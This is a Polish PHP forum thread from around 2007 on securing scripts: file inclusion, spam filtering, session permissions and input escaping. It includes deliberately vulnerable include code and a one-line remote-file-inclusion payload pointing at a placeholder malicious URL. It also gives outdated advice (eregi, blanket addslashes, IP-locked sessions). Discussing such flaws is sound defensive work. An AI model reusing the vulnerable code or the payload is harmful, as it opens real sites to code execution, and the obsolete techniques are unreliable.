Bezpieczeństwo skryptów PHP, Jak zabezpieczyć się przed włamaniem Opcje

[potreb]

Poruszacie tutaj temat łączenia stron, a jak sie ma bezpieczeństwo co do wykonywania jakich zapytań lub wysyłania formularzy. Albo ochrona przed spam botami.

Jak pewnego razu boty zaatakowały moją stronę to, nie mogłem się od nich odpędzić. Tak więc dodałem tokena, ale i to nie pomogło w końcu pomyślałem że dodają skrypty przez jakiegoś exploita napisanego specjalnie dla mojej strony. No i w shoutboxie i katalogu stron zastosowałem funkcje eregi. Jeżeli w tekscie wystepuje słowo "url", lub "http" to wtedy odrzuca formularz. Myślę że to jest dobre rozwiązanie, bo wiele spambotów działa podobnie, zapełniają pola text podobnymi tekstami.

[bełdzio]

co do plików => http://www.beldzio.com/bezpieczenstwo-dost...do-plikow.freez
co do spamu => http://www.beldzio.com/walka-ze-spambotami.freez

[consto]

Witam wszystkich ...

Temat bezpiecznego podpinania pików jest dość ciekawy i chyba rozwiązań jest tyle ile programistów.

Ja stosuję takie rozwiązanie i chyba całkiem dobre, które jednocześnie spełnia rolę maskowania adresu (dobre jeśli jakiś serwer nie obsługuje mod-rewrite).

adresy wyglądają tak:

http://domena.pl/index.php?podstronka,1,jakieś_dane,kolejne,...

oczywiście zamiast "," można dać dowolny inny znak

Kod

<?php



1.     $katalog=array(1=>"nazwa_katalogu_jeden", "następna_nazwa_katalogu", ........);
2.   if(eregi("^[a-zA-Z0-9,]+$",$_SERVER["QUERY_STRING"])) {            
3.     $adres = explode(',',$_SERVER["QUERY_STRING"]);          
4.       $plik_name         = $adres[0];                                          
5.       $katalog_name   =  $adres[1];                                        
6.       $adres_name     = $katalog_name.'/'.$plik_name.'.php';
7.  if ($plik_name<>''){                                                                  
8.  if (file_exists( $adres_name)){                                                
9.       require(" $adres_name'");}                                                
10.   else {require("strona_error.php");}                                            
11. }
12. else {require("strona_error.php");}
13. }
14. else {require("strona_głowna.php");}                                      

?>

Na początek sprawdzam czy w url-u (po znaku"?") nie ma "zakazanych" znaków ... url może zawierać tylko małe i duże litery alfabetu bez polskich znaków, liczby 0-9 oraz "," ... pozostałe znaki są uznawane jako próba "włamania"
Kolejny etap to tworzenie z " ?podstronka,1, jakieś_dane ,kolejne,... " tablicy o nazwie $adres.
Przypisanie zmiennym $plik_name = $adres[0]; (nazwa pliku do podpięcia), $katalog_name = $adres[1]; (id katalogu z tablicy $katalog) i $adres_name (czyli gotowy adres do pliku). Teraz sprawdzam, czy zmienna z nazwą pliku zawiera jakieś dane(można to zrobić wcześniej ... rzecz gustu). W końcu sprawdzam, czy plik o takiej nazwie istnieje w danym katalogu. Jeśli tak to podpinam plik, a jeśli nie to podpinam podstronę z komunikatem błędu (z możliwością dopisania IP i nazwy przeglądarki usera do bazy i po np. 5 próbach wpisania błędnego adresu zablokowanie IP na określony czas)

Kolejne numery, czyli: $adres[2], $adres[3], ... , $adres[X], to poprostu zmienne, które już są przefiltrowane i można bezpiecznie użyć ich w skryptach bez stosowania metody $_GET['zmienna'].

Można jeszcze dodać sprawdzanie domeny, czy przypadkiem podstrona nie jest wywoływana z pod innego adresu niż adres naszego serwera.

Jeśli ktoś ma pomysły na ulepszenie mojej wersji to bardzo proszę ... może wspólnie uda się stworzyć coś naprawdę dobrego

Ten post edytował consto 18.10.2007, 22:15:04

[marcio]

czytalem juz ten temat kilka razy i teraz przeczytalem na nowo na php nie znam sie dobze bo robie duzo bledow ale duzo ludzi pisze ze taki kod jest bezpieczny

[PHP] pobierz, plaintext 
<?php
$file=$_GET['id'].'.php';
if(file_exists($file)) {
include $file;
} else {
echo 'Błąd 404';
}
?>
[PHP] pobierz, plaintext 

lecz wedlug mnie nie jest on bezpieczny poniewaz
1)nie sprawdzamy czy sa to cufry w przypadku id artu czy user'a lub czy sa tylko litery
2)jesli na servie magic_quotes = off to jest null byte poinson i w zaleznosci co sie uzylo czy include czy fopen
3)tu jest LFI. RFI nie ma bo sprawdzamy czy dany plik isnieje na serverze lecz juz cos takiego

[PHP] pobierz, plaintext 
<?php
$file=$_GET['id'].'.php';
if(file_exists($file)) {
include basename($file);
} else {
echo 'Błąd 404';
}
?>
[PHP] pobierz, plaintext 

jest bezpieczne jesli plik ktory includujemy jest przynajmniej 2 katalogi wyzej dobrze mowie czy nie??Ja i tak jestem zwolennikiem uzuwania switch'a lub if'ow :D

[gladiror]

[PHP] pobierz, plaintext 
<?php
$file=$_GET['id'].'.php';
if(file_exists($file)) {
include $file;
} else {
echo 'Błąd 404';
}
?>
[PHP] pobierz, plaintext 

Pewnie, że to jest niebezpieczne. Wystarczy za zmienna id wstawić:

[PHP] pobierz, plaintext 
<?php
$_GET['id'] = 'http://niebezpiecznastrona.pl/niebezpieczny_skrypt';
?>
[PHP] pobierz, plaintext 

i już masz ciekawą sytuację

[bełdzio]

@marcio check this http://www.beldzio.com/bezpieczenstwo-dost...do-plikow.freez

[Brick]

Chciałbym zwrócić uwagę na jedną rzecz związaną z zapisywaniem identyfikatora i praw dostępu użytkownika do sesji.
Często robi się tak, że po zalogowaniu użytkownika, dane takie jak jego ID oraz jego uprawnienia są zapisywane do sesji. Widziałem wiele razy takie rozwiązania.
Przykładowo:
Zalogowany user: "Kazek", ID=50, ma uprawnienia "administrator serwisu"

Wszystko jest dobrze, tylko gdy np. szef firmy dowie się że Kazek właśnie siedzi w domu przy komputerze i chce ukraść wszystkie dane to nic nie może z tym zrobić. Gdy zmieni mu uprawnienia, zablokuje lub usunie konto, to dopóki Kazek jest zalogowany może robić co chce.

Rozwiązanie jest oczywiście proste, tj zanim skrypty php cokolwiek zrobią, jakiś skrypt sprawdzający pobiera z bazy danych informacje o zalogowanym użytkowniku. Sprawdza czy taki user istnieje, czy nie ma zablokowanego konta oraz jaki ma poziom. W wypadku gdy coś się nie zgadza, blokuje dostęp do wszystkiego i kasuje sesje.

W tym wypadku jedyne co trzeba zapisać do sesji to ID usera bo reszta jest i tak pobierana z bazy.

Poprawcie mnie jeżeli się mylę.

[Kocurro]

Na tym polega odpowiednie zaprogramowanie autentykacji (uwierzytelniania) i autoryzacji.

Chociaż wiele osób o tym zapomina

Do tego dobrze jest zawsze sesje mieć przechowywane w bazie danych - dzięki temu zawsze można wymusić akcję na zalogowanej osobie

pozdr.

[mike]

Wrzucenie uprawnień do sesji ma na celu dwie rzeczy:
1. Możliwość wyświetlania opcji zależnych od uprawnień wymaga informacji o wszystkich uprawnieniach użytkownika;
2. Pobieranie drzewa uprawnień podczas każdego żądania byłoby bez sensu.

Jeśli chodzi natomiast o reakcję na zmianę uprawnień dla użytkownika, którego sesja właśnie trwa to nie ma żadnego problemu.
Kwestią jest to że przed każdą operację powinno sprawdzać się szczegółową funkcję, która właśnie jest używana.

Przykładowo: Jeśli komuś wyświetlił się przycisk usuń to nie znaczy, że coś się usunie po kliknięciu weń.

[Kocurro]

Rozwijając moją poprzednią wypowiedź:

Sesje trzymam w bazie, oprócz standardowych kolumn: SID, Dane, Czas ... mam kolumny: Uzytkownik_ID, Odswiez ...

Gdy użytkownik traci dostęp zmieniam Uzytkownik_ID na wartosc 0 ... a gdy tylko zmieniam uprawnienia to Odswiez przyjmuje wartosc true ... i przy następnym przejściu odświeżam wszystkie dane typu tego gdzie Odśwież jest na true

Jak do tej pory nie miałem problemów z tym, że kogoś wyciąłem a on dalej grzebał mi

pozdr.

[Sedziwoj]

2. Pobieranie drzewa uprawnień podczas każdego żądania byłoby bez sensu.

Dlatego przy każdym otworzeniu strony można by było sprawdzić datę ostatniej modyfikacji i porównać z sesją. Czas działania skryptu jest na tyle mały, że nie ma sensu przy wywoływaniu każdej czynności sprawdzać.
Oczywiście można też zrzucić na bazę logowanie, a wtedy przy zmianie danych automatycznie by się odnowiły dane o poziomie dostępu, tylko byśmy pobierali te już raz "sklejone" dane.

Mimo wszystko duża część stron nie wymaga takiego zabezpieczenia, bo jak z praw dostępu korzysta jedna osoba, to nie ma sensu sprawdzanie ich po zalogowaniu, nikt ich nie odbierze.

[Jarod]

Ja uprawnienia pobieram tylko podczas logowania, natomiast przed każdym wywołaniem akcji, kontroler (wykorzystuje do tego napisaną klasę ACL) sprawdza czy użytkownik może daną akcję wywołać. Automatycznie też sprawdzane jest, czy maksymalny czas nieaktywności nie został przekroczony (za to odpowiada handler sesji) - jeśli tak, user zostaje przekierowany na stronę logowania.


Pozdrawiam

[MajareQ]

Może wrócę do bezpieczeństwa bezpośredniego...
Oto kod zebezpieczający przed wieloma atakami...
nalezy go umieścić przed wszystkimi innymi skryptami...

[PHP] pobierz, plaintext 
<?php
if (!get_magic_quotes_gpc())
{
function gpc_value($value)
{
if (is_array($value))
{
$value = array_map('gpc_value', $value);
}
else
{
$value = addslashes($value);
}
return $value;
}
 
if (!empty($_GET))
{
$_GET = gpc_value($_GET);
}
 
if (!empty($_POST))
{
$_POST = gpc_value($_POST);
}
 
if (!empty($_COOKIE))
{
$_COOKIE = gpc_value($_COOKIE);
}
}
?>
[PHP] pobierz, plaintext 

[bełdzio]

Oto kod zebezpieczający przed wieloma atakami...

np jakimi?

[MajareQ]

Wszystkimi dotyczącymi formularzy, ciastek, SQL icjection etc.

a ten zabezpiecza przed Session Fixation i Session Hijacking

Kod

if (!isset($_SESSION['inicjuj']))
        {
                session_regenerate_id();
                $_SESSION['inicjuj'] = true;
                $_SESSION['ip'] = $_SERVER['REMOTE_ADDR'];
        }
        
        
        if($_SESSION['ip'] !== $_SERVER['REMOTE_ADDR'])
        {
                die('Proba przejecia sesji udaremniona!');      
        }

[sobstel]

@MajareQ, poczytaj trochę więcej o bezpieczeństwie, a potem dopiero nas uraczaj cudownymi uniwersalnymi skryptami zabezpieczającymi, ok?

co do drugiego skryptu, wyobraź sobie sytuacje, w której jesteśmy w tej samej sieci lokalnej (na zewnątrz mamy to samo IP), rozpoczyam sesję i daję ci linka. zapobiegłeś session fixation? (nie mówiąc o tym, że ograniczyłeś dostęp ludziom, których ip może się zmieniać w czasie połączenia).

[kszychu]

W tym temacie wszystko zostało już powiedziane.

W kwestiach bezpieczeństwa taka sytuacja nie istnieje. Co jakiś czas pojawiają się nowe ataki i nowe metody zapobiegania im.

Mam propozycje dla moderatora aby usunął te kilka ostatnich postów aby nie robił się burdel w tym topicu.
pzdr

Mam propozycję dla osób z zacięciem moderatorskim; powstrzymajcie się od takich postów. Zamiast tego używajcie odpowiedniego przycisku, w celu zgłoszenia moderatorom jakiegoś nadużycia.
Adwersarzy proszę o jedynie wypowiedzi merytoryczne, bez osobistych "przytyczek".

[Jarod]

W kwestiach bezpieczeństwa taka sytuacja nie istnieje. Co jakiś czas pojawiają się nowe ataki i nowe metody zapobiegania im.

Zgadza się, ale kolega nie napisał nic co ni byłoby już poruszane na tym forum. Poza tym odbieram jego posta jako próbę wymuszenia oceny jego "rozwiązania", a w tym celu mógł napisać nowego posta z prośbą o ocenę a nie klepać w przyklejonym temacie. Teaty przyklejone powinny zawierać konkretne informacje a nie dyskusje ciągnące się na x-stron (chyba że są to ciekawe i przydatne informacje).

Mam propozycję dla osób z zacięciem moderatorskim; powstrzymajcie się od takich postów. Zamiast tego używajcie odpowiedniego przycisku, w celu zgłoszenia moderatorom jakiegoś nadużycia.

Oprócz tego użyłem przycisku "Raportuj", prosiłem o usunięcie kliku ostatnich postów - w tym także mojego.

pzdr

[cool_solar]

strip_tags();
htmlspecialchars();

zaobserwowałem, że zastosowanie funkcji striptags powoduje nieprawidłowe działanie dla plików zawierających na przykład jakieś matematyczne wyliczenia i znaki mniejszości i większkości, wywalane są nie tylko znaczniki HTML ale również tekst; nie wiem tylko czy jest to błąd konkretnej wersji php czy też ogólnie złe działanie funkcji

[Sedziwoj]

@cool_solar
Raczej brak zrozumienia działania funkcji. Pomyśl poczytaj, a znajdziesz odpowiedź.